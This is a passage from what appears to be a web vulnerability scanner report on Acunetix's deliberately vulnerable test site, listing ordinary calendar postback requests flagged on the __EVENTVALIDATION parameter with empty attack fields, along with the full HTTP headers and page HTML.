align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1097 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,097 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8395&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgCAvyHU5toIZGRkwVHKcPQwibhyURf5fPxRoxqoh1Q%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK9%2Bq6vBwL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gWjGDg3fmzfaRvmE4bpDJiRMHOFHQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:46:25 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgCAvyHU5toIZGRkwVHKcPQwibhyURf5fPxRoxqoh1Q=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK9+q6vBwL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gWjGDg3fmzfaRvmE4bpDJiRMHOFHQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:White" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1113 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,113 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8459&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgCAL7weGdsIZGRkP4amw%2BJwJLg90oj0TeHe%2Fs89ejU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKA%2BO3GAwLRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJGMaP0KwEem6XndajfEjcn5KdsPA%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:52:10 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgCAL7weGdsIZGRkP4amw+JwJLg90oj0TeHe/s89ejU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKA+O3GAwLRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJGMaP0KwEem6XndajfEjcn5KdsPA=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:White" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a 